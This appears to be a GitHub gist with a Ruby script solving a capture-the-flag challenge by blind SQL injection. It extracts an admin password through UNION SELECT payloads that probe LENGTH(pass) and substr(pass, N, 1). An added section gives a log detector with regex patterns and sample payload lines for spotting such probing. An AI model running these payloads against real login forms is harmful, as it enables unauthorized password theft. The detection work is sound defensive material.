@kimitoboku
Last active August 29, 2015 14:05
require 'uri'
require 'net/http'

# POST query_hash as a form body to uri and return the response body.
# The method argument is unused and the target port is hard-coded to 10080.
# URI.escape was removed in Ruby 3.0, so this script needs Ruby 2.x.
def http_request(method, uri, query_hash={})
  query = query_hash.map{|k, v| "#{k}=#{v}"}.join('&')
  query_escaped = URI.escape(query)
  uri_parsed = URI.parse(uri)
  http = Net::HTTP.new(uri_parsed.host,10080)
  return http.post(uri_parsed.path, query_escaped).body
end

url = 'http://ctfq.sweetduet.info/~q6/'

# Step 1: find the password length. A response longer than 1000 bytes is
# treated as "the injected condition was true".
num = 0
100.times do |i|
  req = {
    "id" => "admin",
    "pass" => "' UNION SELECT * FROM user WHERE id = 'admin' AND LENGTH(pass) <= #{i} --"
  }
  n = http_request("POST",url,req)
  if(n.size > 1000) then
    puts i
    num = i
    break
  end
end

# Step 2: recover the password one character at a time by comparing
# substr(pass, position, 1) against each candidate in ss.
ss = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+|~`\=-[]{};':,./<>?"
num.times do |i|
  ss.size.times do |j|
    req = {
      "id" => "admin",
      "pass" => "' UNION SELECT * FROM user WHERE id = 'admin' AND substr(pass, #{i+1}, 1) = '#{ss[j]}' --"
    }
    n = http_request("POST",url,req)
    if(n.size > 1000) then
      print ss[j]
      break
    end
  end
end
puts
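
The script above recovers the password one comparison at a time, so it leaves a run of `LENGTH(pass)` and `substr(pass, N, 1)` probes from a single client in the request logs. The detector below is an added example, not part of the original gist; the log format (client IP followed by the URL-encoded POST body), the sample records, and the `blind_sqli_clients` name and threshold are assumptions made for illustration.

```ruby
require 'uri'
require 'set'

# Constructed sample records: "client_ip urlencoded_POST_body", one per line.
SAMPLE_LOG = <<~LOG
  198.51.100.4 id=alice&pass=correct+horse%27s+battery
  203.0.113.7 id=admin&pass=%27+UNION+SELECT+*+FROM+user+WHERE+id+%3D+%27admin%27+AND+LENGTH(pass)+%3C%3D+0+--
  203.0.113.7 id=admin&pass=%27+UNION+SELECT+*+FROM+user+WHERE+id+%3D+%27admin%27+AND+LENGTH(pass)+%3C%3D+1+--
  203.0.113.7 id=admin&pass=%27+UNION+SELECT+*+FROM+user+WHERE+id+%3D+%27admin%27+AND+substr(pass%2C+1%2C+1)+%3D+%27a%27+--
  203.0.113.7 id=admin&pass=%27+UNION+SELECT+*+FROM+user+WHERE+id+%3D+%27admin%27+AND+substr(pass%2C+1%2C+1)+%3D+%27b%27+--
  203.0.113.7 id=admin&pass=%27+UNION+SELECT+*+FROM+user+WHERE+id+%3D+%27admin%27+AND+substr(pass%2C+2%2C+1)+%3D+%27a%27+--
  198.51.100.9 id=bob&pass=length(8)chars
LOG

# LENGTH(col) compared with a number, and a one-character substr(col, N, 1) comparison.
LENGTH_PROBE = /\blength\s*\(\s*\w+\s*\)\s*(?:<=|>=|[<>=])\s*\d+/i
CHAR_PROBE   = /\bsubstr(?:ing)?\s*\(\s*\w+\s*,\s*(\d+)\s*,\s*1\s*\)\s*=/i

# Returns { client_ip => { length_probes:, char_probes:, positions: [...] } }
# for clients whose decoded form field carries at least min_probes probes.
def blind_sqli_clients(log, field: 'pass', min_probes: 3)
  stats = Hash.new { |h, ip| h[ip] = { length_probes: 0, char_probes: 0, positions: Set.new } }
  log.each_line do |line|
    ip, body = line.strip.split(' ', 2)
    next unless body&.ascii_only?   # URI.decode_www_form rejects non-ASCII input
    value = URI.decode_www_form(body).to_h[field].to_s
    if value.match?(LENGTH_PROBE)
      stats[ip][:length_probes] += 1
    elsif (m = value.match(CHAR_PROBE))
      stats[ip][:char_probes] += 1
      stats[ip][:positions] << m[1].to_i   # which character offset was tested
    end
  end
  # A single odd-looking password is ignored; repeated probing is reported.
  stats.select { |_ip, s| s[:length_probes] + s[:char_probes] >= min_probes }
       .transform_values { |s| s.merge(positions: s[:positions].sort) }
end

if __FILE__ == $PROGRAM_NAME
  blind_sqli_clients(SAMPLE_LOG).each { |ip, s| puts "#{ip} #{s}" }
end
```

The two benign records (an apostrophe in a password, and a password that merely contains the text `length(8)`) are not reported, because neither forms a comparison probe.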